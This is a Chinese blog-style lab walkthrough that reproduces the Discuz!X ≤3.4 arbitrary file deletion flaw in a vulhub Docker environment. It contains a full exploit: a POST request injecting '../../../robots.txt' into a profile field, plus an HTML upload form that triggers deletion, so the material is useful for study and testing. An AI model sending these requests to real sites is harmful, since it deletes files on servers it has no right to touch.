Discuz!X ≤3.4 任意文件删除漏洞(wooyun-2014-065513)
声明
好好学习,天天向上
漏洞描述
Discuz!X社区软件是一个采用PHP 和MySQL 等其他多种数据库构建的性能优异、功能全面、安全稳定的社区论坛平台。
2017年9月29日,Discuz!修复了一个安全问题2用于加强安全性,这个漏洞会导致前台用户可以导致任意删除文件漏洞。
2017年9月29日,知道创宇404 实验室开始应急,经过知道创宇404实验室分析确认,该漏洞于2014年6月被提交到Wooyun漏洞平台,Seebug漏洞平台收录了该漏洞3,漏洞编号ssvid-93588。该漏洞通过配置属性值,导致任意文件删除。
经过分析确认,原有的利用方式已经被修复,添加了对属性的formtype判断,但修复方式不完全导致可以绕过,通过模拟文件上传可以进入其他unlink条件,实现任意文件删除漏洞。
影响范围
- Discuz!X ≤3.4
复现过程
使用vulhub
这里使用x3.4版本
cd /app/vulhub-master/discuz/x3.4-arbitrary-file-deletion
启动
docker-compose up -d
直接访问IP就行
http://192.168.239.129/
访问后,提示你进行安装
安装时,只用修改数据库地址为db
,其他保持默认即可:
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ses6EjA0-1607170185132)(https://vulhub.org/vulhub/discuz/x3.4-arbitrary-file-deletion/1.png)]
访问http://your-ip/robots.txt
可见robots.txt是存在的:
192.168.239.129/robots.txt
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-SAZ9xVmK-1607170185134)(C:\Users\86156\AppData\Roaming\Typora\typora-user-images\image-20201202163813540.png)]
注册一个一般的用户
http://your-ip/member.php?mod=register
访问
http://192.168.239.129/home.php?mod=spacecp&ac=profile&op=base
按F12,ctrf+F查找关键字formhash,查看到值
抓包,发送请求(自行修改Host、Cookie和your formhash)
POST /home.php?mod=spacecp&ac=profile&op=base HTTP/1.1
Host: localhost
Content-Length: 367
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPFvXyxL45f34L12s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: [your cookie]
Connection: close------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="formhash"your formhash
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="birthprovince"../../../robots.txt
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="profilesubmit"1
------WebKitFormBoundaryPFvXyxL45f34L12s--
提交成功后,可查看个人资料,生日字段已经被注入脏数据
然后,新建一个upload.html
,代码如下,将其中的[your-ip]
改成discuz的域名,[form-hash]
改成你的formhash:
<body><form action="http://[your-ip]/home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=[form-hash]" method="post" enctype="multipart/form-data"><input type="file" name="birthprovince" /><input type="submit" value="upload" /></form>
</body>
保存这个html后,用浏览器打开,让上传一张正常的图片,可是我在我的电脑里面找了好久,都没找到一张正常的图片,无奈自己画了一张,这里有个坑,就是下图
这个原因要么就是你用另外一个浏览器打开了,要么就是你formhash填错了,因为那个xss_check函数就是专门检测formhash的
最后我都用火狐,成功删除robots.txt
使用完关闭镜像(每次用完后关闭)
docker-compose down
docker-compose常用命令
拉镜像(进入到vulhub某个具体目录后)
docker-compose build
docker-compose up -d
镜像查询(查到的第一列就是ID值)
docker ps -a
进入指定镜像里面(根据上一条查出的ID进入)
docker exec -it ID /bin/bash
关闭镜像(每次用完后关闭)
docker-compose down
Discuz!X ≤3.4 任意文件删除漏洞(wooyun-2014-065513)相关推荐
- 服务器漏洞文件被删除漏洞,【华中科技大学 - 漏洞预警】Wordpress = 4.9.6 任意文件删除漏洞...
昨日,互联网上公开了Wordpress <= 4.9.6的任意文件删除漏洞及分析利用材料.该漏洞影响Wordpress全部版本(<= 4.9.6).在攻击者获得基础权限后,可升级角色权限, ...
- PHP代码审计——任意文件删除漏洞(YXcms)
一.代码审计 在我的资源中下载:: YXcms-含有任意文件删除漏洞的源码包 下载即可 删除文件的代码在del()方法,首先通过GET方式接收参数fname传递过来的的值,然后执行in()函数 跟踪i ...
- php任意文件删除漏洞,myblog/phpyun4.3任意文件删除漏洞.md at master · source-trace/myblog · GitHub...
phpyun-expect.class.php任意文件 漏洞信息 公开时间: 2017/08 影响版本: 4.3 利用难度: 2 挖掘难度: 2 漏洞说明 漏洞出现的原因是在于没有对数据进行很好的校验 ...
- 【代码审计】任意文件删除漏洞实例
[代码审计]任意文件删除漏洞实例 任意文件删除漏洞,该漏洞可让攻击者随意删除服务器上的任意文件. 环境搭建: CSCMS :http://www.chshcms.com/ 网站源码版本:Cscms_v ...
- 【代码审计】CLTPHP_v5.5.3后台任意文件删除漏洞分析
0x00 环境准备 CLTPHP官网:http://www.cltphp.com 网站源码版本:CLTPHP内容管理系统5.5.3版本 程序源码下载:https://gitee.com/chich ...
- CLTPHP 5.8 后台任意文件删除漏洞
CLTPHP 5.8 后台任意文件删除漏洞 一.漏洞简介 CLTPHP是基于ThinkPHP5开发,后台采用Layui框架的内容管理系统, 二.漏洞影响 CLTPHP 5.8及之前版本 三.复现过程 ...
- php任意文件删除漏洞,phpyun二次任意文件删除漏洞
### 简要描述: 只要有任意文件删除 这系统绝对崩. 我吐个槽,最新的过滤文件实在是太BT了,只要有select and .... 就die() 伤不起啊 ### 详细说明: 问题出在 friend ...
- php任意文件删除漏洞,phpshe后台任意文件删除漏洞及getshell | CN-SEC 中文网
摘要 phpshe是一个开源商城程序,程序在前台入库的地方都用了pe_dbhold函数(mysql_real_escape_string,htmlspecialchars过滤),虽然用的是全局变量注册 ...
- linux文件删除漏洞,OpenStack Glance v1 API任意文件删除漏洞(CVE-2012-4573)
发布日期:2012-11-08 更新日期:2012-11-13 受影响系统: openstack Glance Grizzly openstack Glance Essex (2012.1) open ...
- linux glance删除命令,OpenStack Glance v2 API任意文件删除漏洞(CVE-2012-5482)
发布日期:2012-11-08 更新日期:2012-11-13 受影响系统: openstack Glance Grizzly openstack Glance Essex (2012.1) open ...
最新文章
- 编程软件python t-Python 3.7 64位下载
- MySQL锁的用法之行级锁
- POJ - 1091 跳蚤(容斥原理+数论)
- ClientDataSet建立索引和排序
- 给管道注册事件,用于用户是否登录!
- mjorm java_MongoDB 的 ORM框架 MJORM
- Java Web中相对路径与绝对路径的分析
- linux wait函数头文件_第五十八章、linux中的3种正常结束进程的方式你都了解么...
- 关于类型的存储时间和链接
- caffe-windows画loss与accuracy曲线
- vs C4996的错误解决方法
- Java程序员:java软件工程师中级证
- 攻防世界misc——flag_universe
- 水电缴费系统php源码_水电缴费管理系统(示例代码)
- zune自搭虚拟服务器离线升级,Zune 30g 购买/使用 个人经验贴,希望可以帮到有需要的烧友~...
- 《极客与团队》一HRT实战
- 【python与数据分析】实验八——图像批量添加数字水印及实现模拟转盘抽奖游戏
- 小储云方糖消息通知插件配置教程
- 九城卷入仙境传说2网游私服风波
- wap,WML语言与编程
热门文章
- 计算机 随机分组的方法,最小化随机分组方法介绍及其SAS实现
- 云基础架构|部署分类|IaaS|PaaS|SaaS——浅析云计算架构
- matlab kdj代码,KDJ交易系统原理、用法及源代码(KDJ系统)
- boost电路输出电流公式_boost计算公式
- 正弦函数的频谱图matlab,怎样用MATLAB画正弦函数以及怎样看频谱图?
- springboot报错:Use of @OneToMany or @ManyToMany targeting an unmapped class:
- python numpy库数组的存取
- Paper 已经过时——计算机时代科学传播方式的变革
- 解决缓存和数据库双写数据一致性问题
- java a的2次方_java-获取比a大,最接近a的2的次方的数(最小二次幂,位运算)